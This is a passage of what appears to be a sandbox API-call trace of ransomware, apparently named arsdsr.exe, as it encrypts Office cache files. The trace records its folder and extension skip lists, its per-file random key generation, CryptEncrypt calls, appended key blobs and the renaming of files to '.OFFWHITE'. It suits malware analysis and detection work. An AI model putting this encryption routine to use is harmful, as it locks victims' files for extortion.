Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.offwhite")) returned 1 [0086.990] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0086.990] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0086.990] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\" [0086.990] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" [0086.990] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.990] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.990] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0086.990] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0086.991] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0086.991] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0086.991] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0086.991] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0086.991] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0086.991] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0086.991] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0086.991] GetProcessHeap () returned 0x500000 [0086.991] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547cf8 [0086.991] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.991] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=2624) returned 1 [0086.991] GetProcessHeap () returned 0x500000 [0086.991] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.991] GetProcessHeap () returned 0x500000 [0086.991] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.991] GetProcessHeap () returned 0x500000 [0086.991] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.991] GetProcessHeap () returned 0x500000 [0086.991] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.992] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.992] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.992] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.992] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.992] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.992] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.992] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.992] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.992] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.992] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.992] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.992] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.992] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.993] SetLastError (dwErrCode=0x0) [0086.993] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.033] GetLastError () returned 0x0 [0087.033] GetLastError () returned 0x0 [0087.033] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.033] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.034] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.034] WriteFile (in: hFile=0x21c, lpBuffer=0x547cf8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547cf8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.034] GetProcessHeap () returned 0x500000 [0087.034] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xa40) returned 0x526640 [0087.034] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.034] ReadFile (in: hFile=0x21c, lpBuffer=0x526640, nNumberOfBytesToRead=0xa40, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesRead=0x295e540*=0xa40, lpOverlapped=0x0) returned 1 [0087.034] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.034] WriteFile (in: hFile=0x21c, lpBuffer=0x526640*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesWritten=0x295e54c*=0xa40, lpOverlapped=0x0) returned 1 [0087.034] GetProcessHeap () returned 0x500000 [0087.034] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x526640 | out: hHeap=0x500000) returned 1 [0087.034] CloseHandle (hObject=0x21c) returned 1 [0087.036] GetProcessHeap () returned 0x500000 [0087.036] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.036] GetProcessHeap () returned 0x500000 [0087.036] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.037] GetProcessHeap () returned 0x500000 [0087.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.037] GetProcessHeap () returned 0x500000 [0087.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.037] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" [0087.037] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0087.037] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0087.038] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0087.038] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0087.038] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0087.038] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0087.038] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0087.038] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{91140000-0011-0000-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C" [0087.038] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.038] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.038] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" [0087.038] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0087.046] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0087.046] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0087.046] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0087.046] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0087.046] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2=".") returned 1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2="..") returned 1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2="...") returned 1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2="windows") returned -1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$recycle.bin") returned 1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2="rsa") returned -1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2="ntuser.dat") returned 1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2="programdata") returned -1 [0087.046] lstrcmpiW (lpString1="Office32WW.msi", lpString2="appdata") returned 1 [0087.047] lstrcmpiW (lpString1="Office32WW.msi", lpString2="program files") returned -1 [0087.047] lstrcmpiW (lpString1="Office32WW.msi", lpString2="program files (x86)") returned -1 [0087.047] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.047] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.msi" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0087.047] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.047] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.047] PathFindExtensionW (pszPath="Office32WW.msi") returned=".msi" [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0087.047] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0087.047] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0087.047] lstrcmpiW (lpString1="Office32WW.xml", lpString2=".") returned 1 [0087.047] lstrcmpiW (lpString1="Office32WW.xml", lpString2="..") returned 1 [0087.047] lstrcmpiW (lpString1="Office32WW.xml", lpString2="...") returned 1 [0087.047] lstrcmpiW (lpString1="Office32WW.xml", lpString2="windows") returned -1 [0087.048] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$recycle.bin") returned 1 [0087.048] lstrcmpiW (lpString1="Office32WW.xml", lpString2="rsa") returned -1 [0087.048] lstrcmpiW (lpString1="Office32WW.xml", lpString2="ntuser.dat") returned 1 [0087.048] lstrcmpiW (lpString1="Office32WW.xml", lpString2="programdata") returned -1 [0087.048] lstrcmpiW (lpString1="Office32WW.xml", lpString2="appdata") returned 1 [0087.048] lstrcmpiW (lpString1="Office32WW.xml", lpString2="program files") returned -1 [0087.048] lstrcmpiW (lpString1="Office32WW.xml", lpString2="program files (x86)") returned -1 [0087.048] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\" [0087.048] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0087.048] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.048] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.048] PathFindExtensionW (pszPath="Office32WW.xml") returned=".xml" [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.048] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.048] lstrcmpiW (lpString1="Office32WW.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0087.049] GetProcessHeap () returned 0x500000 [0087.049] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547d08 [0087.049] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.056] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=4274) returned 1 [0087.056] GetProcessHeap () returned 0x500000 [0087.056] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.056] GetProcessHeap () returned 0x500000 [0087.056] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.056] GetProcessHeap () returned 0x500000 [0087.056] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.056] GetProcessHeap () returned 0x500000 [0087.056] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.056] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.056] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.056] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.056] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.057] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.057] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.057] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.057] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.057] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.057] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.057] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.057] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.057] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.057] SetLastError (dwErrCode=0x0) [0087.057] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.065] GetLastError () returned 0x0 [0087.065] GetLastError () returned 0x0 [0087.065] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.065] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.065] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.065] WriteFile (in: hFile=0x21c, lpBuffer=0x547d08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d08*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.065] GetProcessHeap () returned 0x500000 [0087.065] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10b2) returned 0x5557b0 [0087.065] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.065] ReadFile (in: 